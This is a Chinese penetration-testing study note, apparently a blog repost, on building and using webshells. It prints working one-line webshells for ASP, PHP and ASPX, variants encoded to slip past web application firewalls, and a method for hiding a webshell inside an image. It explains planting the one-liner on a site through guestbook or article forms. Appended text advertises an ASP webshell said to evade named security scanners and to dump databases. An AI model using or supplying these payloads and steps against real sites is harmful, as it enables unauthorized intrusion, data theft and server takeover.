渗透测试学习 十四、 脚本木马的制作与原理

大纲:webshell制作与原理

   webshell使用技巧

   webshell“黑吃黑”

webshell制作原理

  webshell种类

    一句话木马(使用的最多)、小马、大马、打包马、脱裤马、、、

  一句话木马

    介绍:短小精悍,并且功能强大、隐蔽性非常好,在入侵种始终扮演着非常重要的角色

    e.g:<%execute request("value")%>

    解释:

    execute:是一个执行函数,用来执行该命令

    request:是接收提交方式,可接受post型、get型、cookie型的传参

    value:是参数,也是我们用菜刀连接时的密码

    http://www.xx.com/x.asp?value=  以这种方式接收命令

    用菜刀连接时如下:

    

  常见写法:

    asp一句话:

    <%eval request("pv")%>

    PHP一句话:

    <?php eval($_POST[a])?>

    aspx一句话:

    <%@ Page Language="Jscript"%><%eval(Request.Item["mima"],"unsafe");%>

     jsp一句话:(也是一种小马)

    

  一句话木马的变形(为了绕过waf)

    <?php $_REQUEST['a']($_REQUEST['b']);?>  这种方式已经淘汰了用不了了

    这个语句中没有执行函数,只有两个接收函数,使用的时候对参数a传递执行函数  /x.php?a=eval   然后再用菜刀连接

    

    <%Eval((Request(char(112))))%>

     用ascii码转码,不再使用单引号、双引号,防止闭合

 

    <%eval(eval(char(114)+char(101)+char(113)+char(117)+char(101)+char(115)+char(116)("xindong")%>

    用ascii码转码,不再使用单引号、双引号,防止闭合(asp用+号连接,php用.号连接)

 

    <%a=request("gold")%><%eval a%>

  一句话图片马制作(隐写,建议使用搭建网站的素材图片)

    c32或winhex做一句话

      用该软件打开图片,讲一句话代码放在最后面保存

    cmd下做一句话

      copy /d 1.jpg+1.asp 2.jpg  不建议

    也可以在图片属性中的详细信息中添加一句话(版权中)

  常见的一句话客户端

    一句话客户端增强版

    中国菜刀  右后门  菜刀上传大马1,再删除菜刀码,大马1上传大马2,删除大马1,要脱三次

    中国砍刀

    lanker一句话客户端

    zv新型PHP一句话客户端GUI版

  小马

    体积小,易隐蔽,最重要的是与图片结合在一起上传后可以利用nginx或者iis6的解析漏洞来运行,不过功能少,一般只用来上传大马

  大马

    体积大,50K大小左右,功能多,一般包括提权命令,磁盘管理,数据库连接接口,执行命令甚至有些具备自带的提权功能和压缩,解压缩网站程序功能,隐蔽性不好,而且大多数代码不加密或被查杀。

一句话的使用

    首先,找到数据库是asp格式的网站,然后,以留言板或者发表文章的方式,把一句话添加到数据库,或者网页。我们的目的是把一句话添加到数据库,无论任何方式。然后菜刀连接。

  小马使用

    主要用来上传大马

  大马使用

    提权、打包、脱裤、增删文件、、、

  使用技巧

    内容编码、配合解析漏洞、配合文件包含、利用文件名溢出

      文件包含代码,放在b.asp

    <!--#include file="conn.asp"-->

      conn.asp 就是要包含的文件

  使用的时候直接访问b.asp,就会加载conn.asp文件

webshell“黑吃黑”

  找shell后门

    查找后门、查找webshell后门、找到后门地址、返搞webshell箱子 

 

2019-05-10  14:23:44

转载于:https://www.cnblogs.com/Yuuki-/p/10844244.html

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一、 整体介绍     本身代码经过变量转换和替换字符加密,可完美过安全狗,护卫神,D盾,safe3 Waf,KOasp木马查杀等IIS防火墙和查杀工具。  程序结合海洋顶端asp木马、老兵asp木马、Drakblade暗黑之剑1.3版本、05年到13年主流asp木马的优点进行开发完善制作。  程序在目录检测功能、隐藏功能、数据库操作和提权处做了较大改进,具体请看下列介绍 二、 提交代码经过ascii 2次转码post提交过IIS安全狗,护卫神,D盾,safe3 Waf等IIS防火墙拦截代码。 三、 登陆成功后显示"欢迎界面","欢迎界面"显示服务器安全指数,等级分为 高、中、低三等级,根据wscript.shell磁盘根目录是否可读取等功能判断。  第一项显示:服务器iis版本、服务器超时时间、以及session信息、服务器CPU数量、主机名、默认管理员信息、Terminal Service终端端口(需要wscript.shell组件支持)支持脚本探测(aspx,php,pl)功能,支持bing查询同服务器所有支持aspx脚本站点。 第二项显示:系统当前路径变量。   第三项显示:磁盘根目录的读取权限问题(判断是否可跨站)。 第四项显示:常用组件信息,左侧11个为危险组件,右侧11个为安全组件。   第五项显示:读取c:\windows\system32\sethc.exe 和 c:\windows\system32\magnify.exe 文件的属性、时间、文件体积,从而判断是否被入侵。 四、 右上角的ZONE-H图标为一键提交被黑网页到被黑站点统计www.zone-h.com.cn,个人信息请编辑程序修改,或用生成器生成。 五、 WEB根目录和本程序目录都可以转入文件操作页。  文件操作一:左侧为磁盘和快捷不安全目录查看(目录为智能判断,不存在则不显示)  文件操作二:右侧为文件操作模块和文件夹操作模块。 文件操作支持浏览器模式打开、编辑(支持UTF-8模式编辑)、复制、移动、删除(支持强制删除只读属性文件)、修改属性为隐藏or正常、数据库模式编辑。 文件夹操作支持修改文件夹属性、删除、复制、移动 数据库模式编辑支持查看内容、修改内容、删除内容、拖库。 六、 功能一分为三项功能 目录检测功能,补丁检测功能以及端口扫描功能。这三项功能不需要服务器过多脚本支持,故而放到一起。 ***目录扫描: 支持单文件检测,目录检测,是否循环所有磁盘,是否选择深度目录扫描和子目录扫描(目录扫描结尾必须加入“\”)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值